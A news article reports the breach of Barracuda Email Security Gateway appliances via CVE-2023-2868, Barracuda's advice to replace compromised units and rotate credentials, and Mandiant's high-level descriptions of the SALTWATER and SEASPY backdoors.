Barracuda tells customers to dump infected email security appliances after breach
Customers were first hit in October 2022. End user telemetry flagged something remiss this month... IOCs and Yara rules now shared.
Barracuda, a cybersecurity company with 200,000 customers and 5,000 channel partners, says some users of its Email Security Gateway (ESG) appliances were breached via a zero day over eight months ago – and is now urging those affected to dump the compromised appliance and contact it for a physical replacement, despite issuing a patch.
Barracuda ESG appliances (5.1.3.001-9.2.0.006) were affected by the vulnerability, allocated CVE-2023-2868, which was found after customers reported anomalous traffic from the appliances and Barracuda called in incident responders from Mandiant – who identified a remote command injection vulnerability that had been abused since October 2022.
Barracuda vulnerability: Custom malware deployed
Among four recommended actions, Barracuda on May 30 told customers to “discontinue the use of the compromised ESG appliance” and contact Barracuda support to “obtain a new ESG virtual or hardware appliance.”
(Customers should also check the appliances were getting updates, check logs for IOCs, and rotate credentials including “any connected LDAP/AD; Barracuda Cloud Control; FTP Server; SMB; any private TLS certificates…”)
The suggestion (certainly the public one) after a compromise that customers should dump an appliance and get in touch for a replacement remains highly unusual. It was not immediately clear how many updated boxes Barracuda expects to have to ship; it has not put a number on the affected customers with its response to the breaches still ongoing.
Barracuda should be applauded for its good levels of transparency around the incident and rapid sharing of indicators of compromise (IOC) and other forensics from Mandiant – who found that customers had been hit with previously unknown custom malware strains including a backdoor dubbed “Saltwater,” but industry observers will be frustrated to once again see tools bought to improve security doing precisely the opposite.
(Two other recent examples include the widespread compromise of Fortinet devices, or exploitation of Sophos Firewalls in 2022.)
The two custom malware samples found were:
SALTWATER: “A trojanized module for the Barracuda SMTP daemon (bsmtpd) that contains backdoor functionality. The capabilities of SALTWATER include the ability to upload or download arbitrary files, execute commands, as well as proxy and tunneling capabilities.”
SEASPY: An x64 ELF persistence backdoor that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP). SEASPY also contains backdoor functionality that is activated by a ‘magic packet’.